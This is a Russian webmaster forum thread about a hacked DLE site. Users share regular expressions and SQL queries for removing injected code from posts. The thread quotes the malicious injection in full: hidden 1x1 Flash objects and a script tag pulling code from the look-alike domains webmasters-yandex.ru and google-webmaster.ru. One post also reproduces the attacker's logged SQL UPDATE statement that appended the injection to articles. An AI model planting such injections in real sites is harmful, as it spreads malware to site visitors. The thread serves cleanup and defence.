Форум Сайтостроение Веб-строительство

Взлом базы дле. Как составить рег выражение для очистки sql

AlexejE
На сайте с 05.07.2010
Offline
38
AlexejE
1526

Здравствуйте. Собственно SOS.

Необходимо в NotePad++ заменить часть строки начинающуюся на <object и заканчивающуюся на </script> , после чего перейти на другую строку и начать поиск и замену далее. Необходимо цикличное выражение.

Вот начало:

(<object)[\W\w]*(</script>)

Строка вида:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?d09bf41544a3365a46c9077ebb5e35c3"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?d09bf41544a3365a46c9077ebb5e35c3" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/d09bf41544a3365a46c9077ebb5e35c3.js"></script>

его нужно грамотно удалить не зацепив остальной текст. Прошу помощи.

siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#1

<object classid=.+?</object><script async="async".+?</script>

AlexejE
На сайте с 05.07.2010
Offline
38
AlexejE
#2

Большое спасибо. Помогло.

Д
На сайте с 05.12.2011
Offline
56
Дениско
#3

У меня тоже такой код в каждой статье появился. Удалил, через час снова залили. Каким образом?

P.S. Пришел к выводу что ДЛЕ очень дырявый двиг для сайтов. Буду переносить на Друпал.

Кого интересуют сайты на Ложное срабатывание антивируса Яндекса Файлообменный сервис KiloFile.com -
DeL Esprit
На сайте с 27.01.2010
Offline
223
DeL Esprit
#4

неважно ...........

Тестирую облачный майнинг - узнаем развод или нет. - окупаемость 3 месяца? мелкие суммы (https://goo.gl/aPWmoj) | майнинг Monero, минимум $830 (https://goo.gl/3XivbP) Биржи (ввод/вывод) - на Приват (https://goo.gl/CGZTnD), на Payeer, Capitalist, Advcash, Qiwi... (https://goo.gl/eejAgs)
The WishMaster
На сайте с 29.09.2005
Offline
2542
The WishMaster
#5

Дениско, шелл могут залить через любой движок :) А может быть еще хостер дырявый. Или твой комп заражен. И т. п.

Кому старенького креативного копирайтера? Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#6

вчера почистил 3 базы у клиента (на 3х разных аккаунтах) от подобных вставок, шелл нашелся только на одном сайте.

siv1987, я делал регулярное выражение

<object.*>'.

но оно иногда срабатывало не правильно, выделяя 2-3 строчки, почему?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Запрет в htaccess на HTracer 2.0 - скрипт Взлом DLE всплывает окно
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#7

вчера почистил 3 базы у клиента (на 3х разных аккаунтах) от подобных вставок, шелл нашелся только на одном сайте, может и не в шеллах дело?

siv1987, я делал регулярное выражение

<object.*>'.

но оно иногда срабатывало не правильно, выделяя 2-3 строчки, почему?

Запрет в htaccess на Народ помогите с сайтом, При переходе с поиска
I
На сайте с 13.09.2013
Offline
41
irazumkov
#8

также можно проапдейтить через phpmyadmin 

update dle_post set short_story = left(short_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story) > 0 limit 20000



update dle_post set full_story = left(full_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story) > 0 limit 20000

для полной и краткой новости, выполнить несколько раз, пока не буддет выдаваться: изменено 0 строк.

<script async="async" type="text/javascript" src="http://google-webmaster.ru/

вот эту бяку можно изменить и под <object, перед этим удостовериться, что у Вас в базе нет подобных нужных строк.

Обязательно поменять пароли, очистить кэш и поставить все фиксы для DLE.

Если кто не может справиться ,пишите в личку, помогу.

вот виновник [95.143.193.61], 205.204.90.114 и так же с локалхоста.

# Time: 130911 12:07:05
# User@Host: user[user] @  [95.143.193.61]
# Query_time: 17.477933  Lock_time: 0.021231 Rows_sent: 0  Rows_examined: 99297196
use base;
SET timestamp=1378886825;
UPDATE `base`.`dle_post` 
	SET 
		`short_story` = CONCAT(`short_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1315661091"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?783744512" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>'),
		`full_story` = CONCAT(`full_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?389922127"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1068643096" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>')
	WHERE 
		ID IN ( 
			SELECT ID 
			FROM ( 
				SELECT ID 
				FROM `base`.`dle_post` 
				WHERE `short_story` NOT LIKE '%webmasters-yandex.ru%' AND `full_story` NOT LIKE '%webmasters-yandex.ru%' 
				LIMIT 0,1000
			) as p 
		);
ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#9

Уже начали раньше обсуждать этот вредоносный код. Предлагаю, что бы не плодить кучу тем, там и продолжать, в одном месте. Ссылка на тему

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#10
kgtu5:
siv1987, я делал регулярное выражение

Смотря какой модификатор используется, если не используется молификатор инвертирующий жадность, то следует добавить знак вопроса - .*?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий